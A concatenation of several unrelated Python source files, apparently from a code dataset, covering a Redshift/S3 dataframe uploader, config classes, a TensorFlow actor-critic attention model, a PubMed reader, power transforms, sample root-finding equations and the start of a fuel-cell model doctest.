AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None,
print_sql=False, bucket_location=None, s3_bucket=None):
"""
Upload a dataframe to redshift via s3.
Parameters
----------
name: str
name for your shiny new table
df: DataFrame
data frame you want to save to the db
drop_if_exists: bool (False)
whether you'd like to drop the table if it already exists
        chunk_size: int (10000)
            Number of rows per DataFrame chunk uploaded and COPY'd from S3.
            The COPY is *much* faster when the number of resulting chunks is a
            multiple of your cluster's slices. Ex: DW1.XL nodes have 2 slices
            per node, so if running 2 nodes you will want the data split into
            4, 8, etc. chunks
AWS_ACCESS_KEY: str
your aws access key. if this is None, the function will try
and grab AWS_ACCESS_KEY from your environment variables
AWS_SECRET_KEY: str
            your aws secret key. if this is None, the function will try
and grab AWS_SECRET_KEY from your environment variables
s3: S3
alternative to using keys, you can use an S3 object
print_sql: bool (False)
option for printing sql statement that will be executed
        bucket_location: boto.s3.connection.Location
            a specific AWS location in which to create the temporary transfer s3
            bucket. This should match your redshift cluster's region.
        s3_bucket: str
            name of an existing s3 bucket to use for the transfer instead of
            creating (and later deleting) a temporary one
Examples
--------
"""
if self.dbtype!="redshift":
raise Exception("Sorry, feature only available for redshift.")
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from boto.s3.connection import Location
# if boto is present, set the bucket_location to default.
# we can't do this in the function definition because we're
# lazily importing boto only if necessary here.
if bucket_location is None:
bucket_location = Location.DEFAULT
except ImportError:
raise Exception("Couldn't find boto library. Please ensure it is installed")
if s3 is not None:
AWS_ACCESS_KEY = s3.access_key
AWS_SECRET_KEY = s3.secret_key
if AWS_ACCESS_KEY is None:
AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY')
if AWS_SECRET_KEY is None:
AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY')
if AWS_ACCESS_KEY is None:
raise Exception("Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`")
if AWS_SECRET_KEY is None:
raise Exception("Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`")
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
        # this way users with permission on specific buckets can use this feature
bucket_name = "dbpy-{0}".format(uuid.uuid4())
if s3_bucket:
bucket = conn.get_bucket(s3_bucket)
bucket_name = s3_bucket
else:
bucket = conn.create_bucket(bucket_name, location=bucket_location)
# we're going to chunk the file into pieces. according to amazon, this is
        # much faster when it comes time to run the \COPY statement.
#
# see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html
sys.stderr.write("Transfering {0} to s3 in chunks".format(name))
len_df = len(df)
chunks = range(0, len_df, chunk_size)
def upload_chunk(i):
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
chunk = df[i:(i+chunk_size)]
k = Key(bucket)
k.key = '<KEY>' % (i, i + chunk_size)
k.set_metadata('parent', 'db.py')
out = StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(chunk.to_csv(index=False, encoding='utf-8'))
k.set_contents_from_string(out.getvalue())
sys.stderr.write(".")
return i
threads = []
for i in chunks:
t = threading.Thread(target=upload_chunk, args=(i, ))
t.start()
threads.append(t)
# join all threads
for t in threads:
t.join()
sys.stderr.write("done\n")
if drop_if_exists:
sql = "DROP TABLE IF EXISTS {0};".format(name)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
# generate schema from pandas and then adapt for redshift
sql = pd.io.sql.get_schema(df, name)
# defaults to using SQLite format. need to convert it to Postgres
sql = sql.replace("[", "").replace("]", "")
        # we'll create the table ONLY if it doesn't exist
sql = sql.replace("CREATE TABLE", "CREATE TABLE IF NOT EXISTS")
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
# perform the \COPY here. the s3 argument is a prefix, so it'll pick up
# all of the data*.gz files we've created
sys.stderr.write("Copying data from s3 to redshfit...")
sql = """
copy {name} from 's3://{bucket_name}/data'
credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}'
CSV IGNOREHEADER as 1 GZIP;
""".format(name=name, bucket_name=bucket_name,
AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
sys.stderr.write("done!\n")
# tear down the bucket
sys.stderr.write("Tearing down bucket...")
for key in bucket.list():
key.delete()
if not s3_bucket:
conn.delete_bucket(bucket_name)
sys.stderr.write("done!")
def to_dict(self):
"""Dict representation of the database as credentials plus tables dict representation."""
db_dict = self.credentials
db_dict.update(self.tables.to_dict())
return db_dict
def list_profiles():
"""
Lists all of the database profiles available
Examples
--------
No doctest, covered by unittest
list_profiles()
{'demo': {u'dbname': None,
u'dbtype': u'sqlite',
u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite',
u'hostname': u'localhost',
u'password': None,
u'port': 5432,
u'username': None},
'muppets': {u'dbname': u'muppetdb',
u'dbtype': u'postgres',
u'filename': None,
u'hostname': u'muppets.yhathq.com',
u'password': <PASSWORD>,
u'port': 5432,
u'username': u'kermit'}}
"""
profiles = {}
user = os.path.expanduser("~")
for f in os.listdir(user):
if f.startswith(".db.py_"):
profile = load_from_json(os.path.join(user, f))
tables = profile.pop('tables', None)
if tables:
profile['metadata'] = True
else:
profile['metadata'] = False
profiles[f[7:]] = profile
return profiles
def remove_profile(name, s3=False):
"""
Removes a profile from your config
"""
user = os.path.expanduser("~")
if s3:
f = os.path.join(user, S3_PROFILE_ID + name)
else:
f = os.path.join(user, DBPY_PROFILE_ID + name)
    try:
        if not os.path.isfile(f):
            raise Exception("Profile '{0}' does not exist. Could not find file {1}".format(name, f))
        os.remove(f)
    except Exception as e:
        raise Exception("Could not remove profile {0}! Exception: {1}".format(name, e))
def DemoDB(keys_per_column=None, **kwargs):
"""
Provides an instance of DB that hooks up to the Chinook DB
See http://chinookdatabase.codeplex.com/ for more info.
"""
_ROOT = os.path.abspath(os.path.dirname(__file__))
chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite')
return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)
| 2.09375 | 2 |
app/src/config.py | LucasLaibly/Intrusion | 0 | 12797506 | <reponame>LucasLaibly/Intrusion
class Development(object):
    DEBUG = True
class Testing(object):
    DEBUG = False
class Production(object):
    DEBUG = False
| 1.625 | 2 |
backend/db/entities/commited/base.py | R-N/sistem_gaji_vue_thrift | 0 | 12797507 | from sqlalchemy import MetaData
from sqlalchemy.ext.declarative import declarative_base
DbCommitedEntity = declarative_base(metadata=MetaData(schema="commited")) | 1.828125 | 2 |
src/models/lstm_selfattention_embedding.py | okason97/STONK | 2 | 12797508 | <gh_stars>1-10
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.keras import Model, Sequential
from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional
import numpy as np
def scaled_dot_product_attention(q, k, v, mask):
matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)
# scale matmul_qk
dk = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)
# add the mask to the scaled tensor.
if mask is not None:
scaled_attention_logits += (mask * -1e9)
# softmax is normalized on the last axis (seq_len_k) so that the scores
# add up to 1.
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k)
output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)
return output, attention_weights
class MultiHeadAttention(Layer):
def __init__(self, d_model, num_heads):
super(MultiHeadAttention, self).__init__()
self.num_heads = num_heads
self.d_model = d_model
assert d_model % self.num_heads == 0
self.depth = d_model // self.num_heads
self.wq = Dense(d_model)
self.wk = Dense(d_model)
self.wv = Dense(d_model)
self.dense = Dense(d_model)
def split_heads(self, x, batch_size):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)
"""
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
def call(self, v, k, q, mask):
batch_size = tf.shape(q)[0]
q = self.wq(q) # (batch_size, seq_len, d_model)
k = self.wk(k) # (batch_size, seq_len, d_model)
v = self.wv(v) # (batch_size, seq_len, d_model)
q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)
k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)
v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)
# scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)
# attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)
scaled_attention, attention_weights = scaled_dot_product_attention(
q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)
concat_attention = tf.reshape(scaled_attention,
(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)
output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)
return output, attention_weights
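# Shape sketch (illustrative): with batch_size=2, seq_len=7 and d_model=16,
# MultiHeadAttention(16, num_heads=8) maps three (2, 7, 16) tensors to an
# output of shape (2, 7, 16) plus attention weights of shape (2, 8, 7, 7).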
class AttentionBlock(Layer):
def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5,
name="attention block", rate=0.1, residual=True, last=False, **kwargs):
super(AttentionBlock, self).__init__(name=name, **kwargs)
self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8)
self.dropout1 = Dropout(rate)
self.layernorm1 = LayerNormalization(epsilon=1e-6)
self.cnn_layer = Conv1D(
filters=num_filters,
kernel_size=kernel_size,
# Use 'same' padding so outputs have the same shape as inputs.
padding='same')
self.activation_layer = Activation('relu')
self.dense1 = Dense(hidden_dim/2)
self.dense2 = Dense(hidden_dim)
self.dropout2 = Dropout(rate)
self.layernorm2 = LayerNormalization(epsilon=1e-6)
self.residual = residual
self.last = last
def call(self, x, training, mask=None):
cl_output = self.activation_layer(self.cnn_layer(x))
attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask)
attn_output = self.dropout1(attn_output, training=training)
if self.residual:
x = self.layernorm1(x + attn_output)
else:
x = self.layernorm1(attn_output)
if not self.last:
ff_output = self.dense1(x)
ff_output = self.dense2(ff_output)
ff_output = self.dropout2(ff_output, training=training)
x = self.layernorm2(x + ff_output)
return x
class SharedBlock(Layer):
def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,
text_lenght=5, in_lstm_units = 32, name="shared block", kernel_size=5, **kwargs):
super(SharedBlock, self).__init__(name=name, **kwargs)
self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght)
self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units))
self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0,
last=i==num_blocks-1)
for i in range(num_blocks)]
self.lstm_layer = LSTM(lstm_units)
def call(self, x, z, training, mask=None):
z = self.embedding(z)
z = self.bidirectional_lstm(z)
z = tf.reshape(tf.tile(z, [x.shape[1], 1]),
[x.shape[0], x.shape[1], z.shape[1]])
x = tf.concat([x, z], -1)
for attention_block in self.attention_blocks:
x = attention_block(x)
return self.lstm_layer(x)
class Actor(Layer):
def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,
embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name="actor", **kwargs):
super(Actor, self).__init__(name=name, **kwargs)
        self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,
                                        num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=text_lenght,
                                        in_lstm_units=in_lstm_units, embedding_out=embedding_out)
self.dense_layer = Dense(num_policies, name='actor_output')
def call(self, x, z):
x = self.shared_block(x, z)
return self.dense_layer(x)
class Critic(Layer):
def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,
text_lenght=5, in_lstm_units = 32, kernel_size=5, name="critic", **kwargs):
super(Critic, self).__init__(name=name, **kwargs)
        self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,
                                        num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=text_lenght,
                                        in_lstm_units=in_lstm_units, embedding_out=embedding_out)
self.dense_layer = Dense(1, name='critic_output')
def call(self, x, z):
x = self.shared_block(x, z)
return self.dense_layer(x)
class ActorCritic(Model):
def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,
vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8,
actor_activation=False):
super(ActorCritic, self).__init__()
        self.actor = Actor(num_policies=num_policies, hidden_dim=hidden_dim, text_lenght=text_lenght,
                           num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,
                           in_lstm_units=in_lstm_units, vocabulary_size=vocabulary_size, embedding_out=embedding_out)
        self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,
                             in_lstm_units=in_lstm_units, text_lenght=text_lenght, embedding_out=embedding_out,
                             vocabulary_size=vocabulary_size)
self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd')
self.actor_activation = actor_activation
if self.actor_activation:
self.actor_activation_layer = Activation('sigmoid')
def call(self, x, z):
# Critic
value = self.critic(x, z)
# Actor
actor_output = self.actor(x, z)
std = tf.zeros_like(actor_output) + tf.exp(self.logstd)
if self.actor_activation:
actor_output = self.actor_activation_layer(actor_output)
dist = tfp.distributions.Normal(loc=actor_output, scale=std)
return value, dist | 2.140625 | 2 |
analyze.py | DMinghao/FreelancerJobAnalysis | 2 | 12797509 | import pandas as pd
import numpy as np
import nltk
nltk.download('punkt')
import os
import nltk.corpus
from nltk.probability import FreqDist
from nltk.tokenize import word_tokenize
# read result
result = pd.read_csv("result.csv")
Tags = result["Tag"]
print(Tags)
allTag = ""
for row in result.index:
allTag = allTag + " " + result['Tag'][row]
token = word_tokenize(allTag)
# find the 20 most frequent tags
fdist = FreqDist(token)
fdist20 = fdist.most_common(20)
print(fdist20) | 3.109375 | 3 |
web/pubmed_reader.py | BioSystemsUM/biotmpy | 13 | 12797510 | <filename>web/pubmed_reader.py
from Bio.Entrez import efetch, read
from Bio import Entrez
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
import nltk
from data_structures.document import Document
from data_structures.sentence import Sentence
from data_structures.token import Token
from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary
import string
from pdftitle import get_title_from_io
def pmids_to_docs(pmids, email, dl_config):
docs = []
pmids_not_found = []
for pmid in pmids:
sentences = []
data = get_data_from_pmid(pmid, email)
if data is None:
pmids_not_found.append(pmid)
else:
if data['Title'] != '':
sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't',
doc_id=pmid, stop_words=dl_config.stop_words,
lower=dl_config.lower,
remove_punctuation=dl_config.remove_punctuation,
split_by_hyphen=dl_config.split_by_hyphen,
lemmatization=dl_config.lemmatization,
stems=dl_config.stems))
if data['Abstract'] != '':
sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a',
doc_id=pmid, stop_words=dl_config.stop_words,
lower=dl_config.lower,
remove_punctuation=dl_config.remove_punctuation,
split_by_hyphen=dl_config.split_by_hyphen,
lemmatization=dl_config.lemmatization,
stems=dl_config.stems))
if sentences:
doc = Document(sentences=sentences)
doc.raw_title = data['Title']
docs.append(doc)
else:
pmids_not_found.append(pmid)
return docs, pmids_not_found
# Using PMID
def get_data_from_pmid(pmid, email):
Entrez.email = email
Entrez.api_key = '<KEY>'
handle = efetch(db='pubmed', id=int(pmid), retmode='xml')
xml_data = read(handle)
handle.close()
try:
article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article']
title = article['ArticleTitle']
try:
abstract = article['Abstract']['AbstractText'][0]
return {'Title': title, 'Abstract': abstract}
except:
return {'Title': title, 'Abstract': ''}
except:
article = xml_data['PubmedBookArticle'][0]['BookDocument']
title = article['ArticleTitle']
try:
abstract = article['Abstract']['AbstractText'][0]
return {'Title': title, 'Abstract': abstract}
except:
return {'Title': title, 'Abstract': ''}
# Using Term
def term_to_docs(term, email, retmax, dl_config):
pmids = get_data_from_term(term, email, retmax)
if pmids is None:
return None
else:
docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)
return docs
def get_data_from_term(term, email, retmax):
Entrez.email = email
Entrez.api_key = '<KEY>'
handle = Entrez.esearch(db="pubmed", retmax=retmax, term=term, idtype="acc", sort='relevance')
record = Entrez.read(handle)
handle.close()
return record['IdList']
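# e.g. (illustrative) get_data_from_term("CRISPR", email, retmax=3) returns up
# to three PMIDs ranked by relevance, as a list of id strings.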
# Using PDFs
def pdf_paths_to_titles(pdf_paths, email):
titles = []
for pdf_path in pdf_paths:
with open(pdf_path, 'rb') as f:
titles.append(get_data_from_pdf(f, email))
return titles
def pdfs_to_docs(files, email, dl_config):
pmids = []
docs_not_found = []
try:
for file in files:
pmid = get_data_from_pdf(file, email)
if pmid:
pmids.append(pmid)
else:
docs_not_found.append(file.filename)
docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)
return docs, docs_not_found
except:
return None, None
def get_data_from_pdf(file, email):
Entrez.email = email
Entrez.api_key = '<KEY>'
try:
title = get_title_from_io(file)
pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0]
return pmid
except:
return None
if __name__ == '__main__':
# path = 'D:/Desktop/artigos/rdml.pdf'
# #id = 20367574
# print(get_data_from_pdf_path(path, '<EMAIL>'))
# term = "Predicting commercially available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model"
# print(get_data_from_term(term, '<EMAIL>', 1)['IdList'])
paths = ['D:/Desktop/artigos/Burns.pdf',
'D:/Desktop/artigos/Fergadis.pdf',
'D:/Desktop/artigos/Luo.pdf',
'D:/Desktop/artigos/Mohan.pdf',
'D:/Desktop/artigos/rdml.pdf',
'D:/Desktop/artigos/Yan.pdf']
pdf_paths_to_titles(paths, '<EMAIL>.com') | 2.421875 | 2 |
qiradb/qiradb/__init__.py | pAplakidis/qira | 0 | 12797511 | <filename>qiradb/qiradb/__init__.py
from qiradb._qiradb import *
| 1.179688 | 1 |
common/utils/api_utils.py | hvsuchitra/tv_tracker | 0 | 12797512 | <gh_stars>0
import requests
import requests_cache
# path when running from gui
requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400)
# requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400)
resource_base_url = 'https://thetvdb.com'
api_base_url = 'https://api.thetvdb.com'
resource_base_url_per_ep = 'https://thetvdb.com/banners/'
headers = {}
def get_jwt():
data = {'apikey': 'api_key', 'username': 'username',
'userkey': 'user_key'}
with requests_cache.disabled():
response = requests.post(f'{api_base_url}/login', json=data)
if response.status_code == 200:
global headers
jwt = response.json()['token']
headers['Authorization'] = f'Bearer {jwt}'
return jwt
def search_show(show_name):
shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json()
cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired')
if shows.get('Error'): return None
yield from (
dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col in cols_needed)))
for
show in shows['data'])
def get_image(url):
return requests.get(resource_base_url + url, headers=headers).content
def get_episode_count(show_id):
url = f'{api_base_url}/series/{show_id}/episodes/summary'
response_json = requests.get(url, headers=headers).json()
season_list, episode_count, *_ = response_json['data'].values()
return season_list, int(episode_count)
def get_image_per_ep(url):
return requests.get(resource_base_url_per_ep + url, headers=headers).content
get_jwt()
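# Minimal usage sketch (show name is illustrative; requires valid TVDB credentials in get_jwt):
#   for show in search_show('Doctor Who'):
#       print(show['seriesName'], '-', show['status'])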
| 2.484375 | 2 |
setup.py | LaCiberReserva/api-python-sdk | 6 | 12797513 | from setuptools import setup, find_packages
setup(
name='blueliv-python-sdk',
version='2.3.0',
description='Blueliv API SDK for Python',
url='https://github.com/Blueliv/api-python-sdk',
author='Blueliv',
author_email='<EMAIL>',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='blueliv api crime servers bot ips security',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'],
    tests_require=['mock']
)
| 1.273438 | 1 |
sample_equations.py | lsDantas/Numerical-Analysis | 0 | 12797514 | # Sample Equations
#
# Description: Sample functions (and their derivatives)
# to be used with the root-finding algorithms.
#
# Equation 1
def eq1(x):
return x**5 - 5*x + 1
def eq1_d(x):
return 5*(x**4) - 5
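# Minimal Newton's method sketch (_newton_demo is an assumed helper, not part of
# the original module) showing how each equation pairs with its derivative:
def _newton_demo(f, df, x0, tol=1e-10, max_iter=50):
    x = x0
    for _ in range(max_iter):
        step = f(x) / df(x)  # Newton update: x_{n+1} = x_n - f(x_n)/f'(x_n)
        x -= step
        if abs(step) < tol:
            break
    return x
# e.g. _newton_demo(eq1, eq1_d, 0.0) converges to the root of eq1 near x = 0.2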
# Equation 2
def eq2(x):
return (pow(x, 2) - 4)
def eq2_d(x):
return 2*x | 3.6875 | 4 |
bucky/util/power_transforms.py | hanijames/bucky | 0 | 12797515 | <filename>bucky/util/power_transforms.py
"""Simple power transformation classes."""
# pylint: disable=unused-variable
from ..numerical_libs import sync_numerical_libs, xp
# TODO this could be better organized...
@sync_numerical_libs
def yeojohnson(y, lam):
"""Yeo-Johnson tranform, batched in the first dimension."""
y_in = y.astype(xp.float64)
lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
two_mask = xp.around(xp.ravel(lam1), 4) == 2.0
pos_mask = y_in >= 0.0
zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)
two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)
lam1 = xp.broadcast_to(lam1, pos_mask.shape)
ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask]
ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0)
ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0)
ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask])
return ret, lam1[:, 0][..., None]
@sync_numerical_libs
def inv_yeojohnson(y, lam):
"""Inverse Yeo-Johnson tranform, batched in the first dimension."""
y_in = y.astype(xp.float64)
lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
two_mask = xp.around(xp.ravel(lam1), 4) == 2.0
pos_mask = y_in >= 0.0
zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)
two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)
lam1 = xp.broadcast_to(lam1, pos_mask.shape)
ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0
ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0
ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0
ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0
return ret
@sync_numerical_libs
def boxcox(y, lam, lam2=None):
"""Box-Cox tranform, batched in the first dimension."""
# TODO add axis param
# if axis is None:
# a = xp.ravel(a)
# axis = 0
axis = y.ndim - 1
y_in = y.astype(xp.float64)
lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)
if lam2 is None:
lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask])
ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask]
return ret, lam1, lam2
@sync_numerical_libs
def inv_boxcox(y, lam1, lam2):
"""Inverse Box-Cox tranform, batched in the first dimension."""
y_in = y.astype(xp.float64)
ret = xp.empty(y.shape)
zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0
ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask]
ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask]
return ret
def norm_cdf(x, mu, sigma):
"""Normal distribution CDF, batched."""
t = x - mu[:, None]
y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member
y[y > 1.0] = 1.0
return y
@sync_numerical_libs
def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)):
"""Fit lambda of a power transform using grid search, taking the the most normally distributed result."""
# TODO currently this just minimizes the KS-stat,
# would might better to used shapiro-wilk or 'normaltest' but we'd need a batched version
y_in = xp.atleast_2d(y)
batch_size = y_in.shape[0]
best_ks = xp.full(batch_size, xp.inf)
best_ks_lam = xp.empty(batch_size)
for lam in xp.around(xp.arange(*lam_range), 6):
if yj:
yp, _ = yeojohnson(y, lam)
else:
yp, _, _ = boxcox(y_in, lam)
ys = xp.sort(yp, axis=1)
cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True)
ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1)
ks_mask = ks < best_ks
best_ks[ks_mask] = ks[ks_mask]
best_ks_lam[ks_mask] = lam
return (best_ks, best_ks_lam)
class BoxCox:
"""Wrapper class for a Box-Cox transformer."""
def __init__(
self,
):
"""Init lambda storage."""
self.lam1 = None
self.lam2 = None
def fit(self, y):
"""Fit the batched 1d variables in y, store the lambdas for the inv transform."""
ks = fit_lam(y, yj=False)
ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None])
return ret
def inv(self, y):
"""Inverse tranform using the fitted lambda values."""
return inv_boxcox(y, self.lam1, self.lam2)
class YeoJohnson:
"""Wrapper class for a Yeo-Johnson transformer."""
def __init__(
self,
):
"""Init lambda storage."""
self.lam1 = None
def fit(self, y):
"""Fit the batched 1d variables in y, store the lambdas for the inv transform."""
ks = fit_lam(y, yj=True)
ret, self.lam1 = yeojohnson(y, ks[1][:, None])
return ret
def inv(self, y):
"""Inverse tranform using the fitted lambda values."""
return inv_yeojohnson(y, self.lam1)
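# Minimal round-trip sketch (illustrative; `xp` resolves to numpy or cupy via
# sync_numerical_libs):
#   bc = BoxCox()
#   y = xp.abs(xp.random.randn(4, 100)) + 0.1  # batch of 4 skewed series
#   y_t = bc.fit(y)                            # per-series lambda grid search
#   xp.allclose(bc.inv(y_t), y)                # the inverse recovers the input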
| 2.265625 | 2 |
dztools/DZtools.py | kurtsundell/DZtools | 1 | 12797516 | import sys
#import argparse
import pandas as pd
import matplotlib.pyplot as plt
from dztools.stats.intersample import intersample
from dztools.utils.makeplots import makeplots
xmin = 1  # lower limit for probability density plots (PDPs), kernel density estimates (KDEs), and all plots
xmax = 4000  # upper limit for PDPs and KDEs and all plots
xint = 1  # discretization interval for PDPs and KDEs only
# DZtools options
DZstats = 1
DZmds = 0
PlotDistributions = 1
def DZ_main():
filename = sys.argv[1]
df = pd.read_csv(filename)
if DZstats == 1:
intersample_results = intersample(df, xmin, xmax, xint)
print(intersample_results)
if PlotDistributions == 1:
fig, axs = makeplots(df, xmin, xmax, xint)
plt.show()
if __name__ == '__main__':
DZ_main()
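# Example invocation (file name is illustrative): python DZtools.py ages.csv,
# where the CSV holds the age data expected by intersample() and makeplots().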
| 2.546875 | 3 |
opem/Test/test_Padulles_Amphlett.py | Martenet/opem | 173 | 12797517 | # -*- coding: utf-8 -*-
'''
>>> from opem.Dynamic.Padulles_Amphlett import *
>>> import shutil
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.0684154992732005 V
Eta Activation : 0.18557231242539243 V
Eta Concentration : 1.948431634418616e-05 V
Eta Ohmic : 0.00017548304819292376 V
FC Efficiency : 0.6589203974773784
